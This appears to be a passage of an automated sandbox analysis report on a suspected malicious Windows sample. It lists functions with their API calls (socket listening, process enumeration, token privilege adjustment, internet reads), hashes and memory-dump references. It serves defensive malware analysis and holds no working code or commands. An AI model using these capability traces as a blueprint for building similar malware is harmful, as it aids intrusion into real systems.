                                    Function 00F76596 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • socket.WS2_32(00000002,00000001,00000006), ref: 00F765EF
                                    • WSAGetLastError.WS2_32(00000000), ref: 00F765FE
                                    • bind.WS2_32(00000000,?,00000010), ref: 00F7661A
                                    • listen.WS2_32(00000000,00000005), ref: 00F76629
                                    • WSAGetLastError.WS2_32(00000000), ref: 00F76643
                                    • closesocket.WS2_32(00000000), ref: 00F76657
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: ErrorLast$bindclosesocketlistensocket
                                    • String ID:
                                    • API String ID: 1279440585-0
                                    • Opcode ID: e1f98ce893422d8c033e1323a567e03ae25a53103b47a559ea95d5f53749b8d0
                                    • Instruction ID: a673c138ef8912f3cdcb1f6ba87f39b0e94d961e7bb629aa65d8cd63ea9d710e
                                    • Opcode Fuzzy Hash: e1f98ce893422d8c033e1323a567e03ae25a53103b47a559ea95d5f53749b8d0
                                    • Instruction Fuzzy Hash: 12219E316006049FDB10AF64CC49B7EB7A9EF48320F14815AE95AEB2D2DB74AD05BB52
                                    Function 00F15680 Relevance: 8.0, APIs: 5, Instructions: 516COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F20FF6: std::exception::exception.LIBCMT ref: 00F2102C
                                      • Part of subcall function 00F20FF6: __CxxThrowException@8.LIBCMT ref: 00F21041
                                    • _memmove.LIBCMT ref: 00F5062F
                                    • _memmove.LIBCMT ref: 00F50744
                                    • _memmove.LIBCMT ref: 00F507EB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: _memmove$Exception@8Throwstd::exception::exception
                                    • String ID:
                                    • API String ID: 1300846289-0
                                    • Opcode ID: 835bfb421f31ddc92154905ab73aacda9501bd7c9ecc72e0a63b8197532107c8
                                    • Instruction ID: 04e58c6ad1700bec80118b71cd467004e28cdbde889daaf39f1fb3c5b91f0c8c
                                    • Opcode Fuzzy Hash: 835bfb421f31ddc92154905ab73aacda9501bd7c9ecc72e0a63b8197532107c8
                                    • Instruction Fuzzy Hash: CA02B2B1E00209DFCF04DF64D981AAEBBB5FF84310F1480A9E806DB295EB35D955EB91
                                    Function 00F01287 Relevance: 7.9, APIs: 5, Instructions: 379nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F02612: GetWindowLongW.USER32(?,000000EB), ref: 00F02623
                                    • NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 00F019FA
                                    • GetSysColor.USER32(0000000F), ref: 00F01A4E
                                    • SetBkColor.GDI32(?,00000000), ref: 00F01A61
                                      • Part of subcall function 00F01290: NtdllDialogWndProc_W.NTDLL(?,00000020,?), ref: 00F012D8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: ColorDialogNtdllProc_$LongWindow
                                    • String ID:
                                    • API String ID: 591255283-0
                                    • Opcode ID: 3dd9ab367b8cec38903c3c98f5e649b307a6c5217c915016a61420df66eab6db
                                    • Instruction ID: 5aedd16890a722c4eb1864de66af0cd80153505e9f6bd89dcecadadc4d642338
                                    • Opcode Fuzzy Hash: 3dd9ab367b8cec38903c3c98f5e649b307a6c5217c915016a61420df66eab6db
                                    • Instruction Fuzzy Hash: 6FA13772605549BAEA39ABA94C69FBF369CFF813A1F140119F502D61D2CE2D8D01B3B1
                                    Function 00F76A5A Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F780A0: inet_addr.WS2_32(00000000), ref: 00F780CB
                                    • socket.WS2_32(00000002,00000002,00000011), ref: 00F76AB1
                                    • WSAGetLastError.WS2_32(00000000), ref: 00F76ADA
                                    • bind.WS2_32(00000000,?,00000010), ref: 00F76B13
                                    • WSAGetLastError.WS2_32(00000000), ref: 00F76B20
                                    • closesocket.WS2_32(00000000), ref: 00F76B34
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                    • String ID:
                                    • API String ID: 99427753-0
                                    • Opcode ID: c45e619400484059efe43fa9c2e9d8b926c1a88dd02d478f9a2774ea0b2b2571
                                    • Instruction ID: 3e9fb5556491ebd4f5d94f21fa7b2ddf4facf275e7c44cbf5fc2334ca6539973
                                    • Opcode Fuzzy Hash: c45e619400484059efe43fa9c2e9d8b926c1a88dd02d478f9a2774ea0b2b2571
                                    • Instruction Fuzzy Hash: D941D275B00614AFEB10AF68DC86F7E77A8DB44720F048059F95AEB2C3DA789D01B791
                                    Function 00F855FD Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                    • String ID:
                                    • API String ID: 292994002-0
                                    • Opcode ID: af97a5ce7e711a81689d4bb9314ecd8cf22be672a0f90ef264e4d02381ec2895
                                    • Instruction ID: eac245e906c0eeb1fe0250de56f3de026ce4a38020f99661a2f57ce82524ce0e
                                    • Opcode Fuzzy Hash: af97a5ce7e711a81689d4bb9314ecd8cf22be672a0f90ef264e4d02381ec2895
                                    • Instruction Fuzzy Hash: 8411C4327009156FE7212F26DC44BAFBB99EF44B31B844039F806D7241EB749901ABA4
                                    Function 00F13190 Relevance: 6.6, APIs: 4, Instructions: 587COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: __itow__swprintf
                                    • String ID:
                                    • API String ID: 674341424-0
                                    • Opcode ID: c23d4b87660cdb228cc123c089058f19939799820601fa10158000d83318811c
                                    • Instruction ID: 6dd03472000c850f78ed7a99c70fa5e0acfe0b35ca71f554544a8c67b6d1d6c2
                                    • Opcode Fuzzy Hash: c23d4b87660cdb228cc123c089058f19939799820601fa10158000d83318811c
                                    • Instruction Fuzzy Hash: 8E22CF716083019FC724EF24C881BAFB7E5BF84710F14491DF89697292EB75EA44EB92
                                    Function 00F7F121 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00F7F151
                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00F7F15F
                                      • Part of subcall function 00F07F41: _memmove.LIBCMT ref: 00F07F82
                                    • Process32NextW.KERNEL32(00000000,?), ref: 00F7F21F
                                    • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00F7F22E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                    • String ID:
                                    • API String ID: 2576544623-0
                                    • Opcode ID: 109c73316b52d157505c0f94b3e6db35ecbed45fc0dcff708f3a140fd4ff8b83
                                    • Instruction ID: 80b02f02a05970c2a8aae8cbbf68dcd6f44978521f0f23d7bba28bbb1b56727e
                                    • Opcode Fuzzy Hash: 109c73316b52d157505c0f94b3e6db35ecbed45fc0dcff708f3a140fd4ff8b83
                                    • Instruction Fuzzy Hash: 4A518171508701AFD310EF24DC85E6BB7E8FF98750F50482DF49597292EB74A908EB92
                                    Function 00F8C788 Relevance: 6.1, APIs: 4, Instructions: 83nativewindowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F02612: GetWindowLongW.USER32(?,000000EB), ref: 00F02623
                                    • GetCursorPos.USER32(?), ref: 00F8C7C2
                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00F3BBFB,?,?,?,?,?), ref: 00F8C7D7
                                    • GetCursorPos.USER32(?), ref: 00F8C824
                                    • NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,00F3BBFB,?,?,?), ref: 00F8C85E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                                    • String ID:
                                    • API String ID: 1423138444-0
                                    • Opcode ID: a34f091fab895ab50a8b199d45067a14748aea5a369e61dc4170ff7c13416807
                                    • Instruction ID: cdd4149f241f132db944b46b9d4bbfbf71f6424a8f501c7c441193b8dc7ee7fa
                                    • Opcode Fuzzy Hash: a34f091fab895ab50a8b199d45067a14748aea5a369e61dc4170ff7c13416807
                                    • Instruction Fuzzy Hash: 8D315C35A00018AFCB25DF58C899EFA7BBAEF49720F444169F9058B2A1C7359D50FBA0
                                    Function 00F640B1 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00F640D1
                                    • _memset.LIBCMT ref: 00F640F2
                                    • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00F64144
                                    • CloseHandle.KERNEL32(00000000), ref: 00F6414D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: CloseControlCreateDeviceFileHandle_memset
                                    • String ID:
                                    • API String ID: 1157408455-0
                                    • Opcode ID: 9b5b7f670f47db4e4e85eb80a23c976a620ec67bbc893971bed0c1d58a51224f
                                    • Instruction ID: a1d76a47c2e1fdd030f04f46f63ca8f711205386aa9bd1d25ad51ca2b9bd64be
                                    • Opcode Fuzzy Hash: 9b5b7f670f47db4e4e85eb80a23c976a620ec67bbc893971bed0c1d58a51224f
                                    • Instruction Fuzzy Hash: DD11E775D0122C7AD730ABA5AC4DFEBBB7CEF44760F1042AAF908D7180D6744E849BA4
                                    Function 00F01290 Relevance: 6.1, APIs: 4, Instructions: 59nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F02612: GetWindowLongW.USER32(?,000000EB), ref: 00F02623
                                    • NtdllDialogWndProc_W.NTDLL(?,00000020,?), ref: 00F012D8
                                    • GetClientRect.USER32(?,?), ref: 00F3B84B
                                    • GetCursorPos.USER32(?), ref: 00F3B855
                                    • ScreenToClient.USER32(?,?), ref: 00F3B860
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Client$CursorDialogLongNtdllProc_RectScreenWindow
                                    • String ID:
                                    • API String ID: 1010295502-0
                                    • Opcode ID: 66467549bc52b6d1e655102c78ee05226ac4a351ff6fe10314481be62b4a514c
                                    • Instruction ID: 4922a664179e0d6b930e8b1d5625ea263bd8d33525d47b1fbdd3509ac36f2a08
                                    • Opcode Fuzzy Hash: 66467549bc52b6d1e655102c78ee05226ac4a351ff6fe10314481be62b4a514c
                                    • Instruction Fuzzy Hash: 86112536A0001DEFCB00EFA8D8899FE77B8FB05300F400456F901E7291D734AA55BBA5
                                    Function 00F5EB07 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00F5EB19
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: lstrlen
                                    • String ID: ($|
                                    • API String ID: 1659193697-1631851259
                                    • Opcode ID: 62359b7b967a81c376e9f86c318100bc7795550edaad947242c3507ec5c8291e
                                    • Instruction ID: 83bff0300a2da12814497a456411d903b2544fcbc8043f0e25a42e366fa4a36d
                                    • Opcode Fuzzy Hash: 62359b7b967a81c376e9f86c318100bc7795550edaad947242c3507ec5c8291e
                                    • Instruction Fuzzy Hash: C6324775A007059FC728CF19C481A6AB7F1FF48320B15C56EE99ADB3A1EB70E945DB40
                                    Function 00F725E2 Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 00F726D5
                                    • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00F7270C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Internet$AvailableDataFileQueryRead
                                    • String ID:
                                    • API String ID: 599397726-0
                                    • Opcode ID: 7534303c3dd6d8788dd0559561ec5a2761a1448b117e2326f4ebea80d053fb9a
                                    • Instruction ID: 78b7172baffd377ee82c6bfc0fd2ab29ebc9572c992777c1ec796a9eb5bcc0e0
                                    • Opcode Fuzzy Hash: 7534303c3dd6d8788dd0559561ec5a2761a1448b117e2326f4ebea80d053fb9a
                                    • Instruction Fuzzy Hash: 1F41D672900209BFEB60DE54DD85FBFB7BCEB40724F10806FF609A6140EA759E41B656
                                    Function 00F6B59E Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetErrorMode.KERNEL32(00000001), ref: 00F6B5AE
                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00F6B608
                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00F6B655
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: ErrorMode$DiskFreeSpace
                                    • String ID:
                                    • API String ID: 1682464887-0
                                    • Opcode ID: fb68fa5568c5ad1b44a9ec1728476fbe125d6948fbb1f2c9eada24450674c1c5
                                    • Instruction ID: 1f4904caa5e83ac75860e0c05e247025e6aa323925451d43527b4b4b14599b11
                                    • Opcode Fuzzy Hash: fb68fa5568c5ad1b44a9ec1728476fbe125d6948fbb1f2c9eada24450674c1c5
                                    • Instruction Fuzzy Hash: 7B218E35A00508EFCB00EFA5DC84AEDBBB8FF48310F0480A9E805EB351DB35A955EB50
                                    Function 00F58CC3 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F20FF6: std::exception::exception.LIBCMT ref: 00F2102C
                                      • Part of subcall function 00F20FF6: __CxxThrowException@8.LIBCMT ref: 00F21041
                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F58D0D
                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F58D3A
                                    • GetLastError.KERNEL32 ref: 00F58D47
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                    • String ID:
                                    • API String ID: 1922334811-0
                                    • Opcode ID: a13f4d0600c4bff6eb111c58b6bd87a65f2ca1e23ff35160f301a0f21220f561
                                    • Instruction ID: 0fc5a978f78766979e14723b7c63d3b5782f7bd4bbd7807983aa074c046d3c4d
                                    • Opcode Fuzzy Hash: a13f4d0600c4bff6eb111c58b6bd87a65f2ca1e23ff35160f301a0f21220f561
                                    • Instruction Fuzzy Hash: 7F118FB2814209AFD728DF54EC85DABB7F9FB44751B20852EF85693241EF30AC459B60
                                    Function 00F64C03 Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00F64C2C
                                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00F64C43
                                    • FreeSid.ADVAPI32(?), ref: 00F64C53
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
